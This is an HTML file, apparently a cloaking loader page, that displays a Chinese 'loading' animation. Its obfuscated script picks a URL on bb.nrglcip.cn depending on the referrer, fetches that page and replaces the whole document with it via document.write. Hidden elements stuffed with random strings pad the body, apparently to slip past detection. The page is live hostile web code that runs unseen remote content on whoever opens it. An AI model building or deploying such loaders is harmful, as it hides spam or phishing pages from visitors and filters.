<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .zNs8Xhf {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .zNs8Xhf .fb1c6pme {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .zNs8Xhf .content {
            line-height: 50px;
            text-align: center
        }

        .zNs8Xhf .img {
            width: 100%
        }

        .zNs8Xhf .pSoRf0p40 {
            text-align: center
        }

        .zNs8Xhf .pSoRf0p40 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .zNs8Xhf .pSoRf0p40 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .zNs8Xhf .pSoRf0p40 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .zNs8Xhf .pSoRf0p40 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .zNs8Xhf .pSoRf0p40 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .zNs8Xhf .pSoRf0p40 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .zNs8Xhf .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function oA8qqbl0BDd(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var nSQUMKS = oA8qqbl0BDd('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ nSQUMKS +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ nSQUMKS +".html?a=share";
		}
		
        eeaqJ8GoAx=url+"#"+new Date().getTime();
        eeaqJ8GoAx && function() {
            $.get(eeaqJ8GoAx, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>OkRk46h0buaIIuO</p>
<span style='display:none'>iT9xYMyMm3noKPxYl6gulz6TYDJSsiE8XSiA29</span>
<ul style='display:none' >caL3aHPdOxTcNWNV2npf5XWJ3T9irFtv2H4JdWunH9A4ufyOm89b</ul><div class="zNs8Xhf">
    <div class="fb1c6pme">
        <div class="pSoRf0p40">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>o2zrGH0N27ZuYDb82CcOP65bKzyBU3FL</a>
<div style='display:none'>WtAuMtPV18nfNr2g65M3YjBexxkfa5pEOXG4Oe19qmbd</div>
<ul style='display:none' >z98IjaSx5TgFBiMt7ObwrlVvNFuJ8uuYh6RCBG</ul>
<b style='display:none' >vvqq2Ll8Fj3t23Z9IdKUTEy0Lo6oZo7NVmgWkfNEi3aSNStDXHt0scUMFCZdniH</b>
<p  style='display:none'>E5Ff53s7xpfz3CUJaVkAEZkvMfY9TKaQGaQzhSuyrS3</p>
<a  href='#' style='display:none'>o2zrGH0N27ZuYDb82CcOP65bKzyBU3FL</a>
<p  style='display:none'>E5Ff53s7xpfz3CUJaVkAEZkvMfY9TKaQGaQzhSuyrS3</p>
<li style='display:none' >SpyqQRrSkuJ4p0iYoNH42TmSzxddCofcnLJldViNWzRUicY</li>
<img  src='' style='display:none'>
<img  src='' style='display:none'></body>
</html>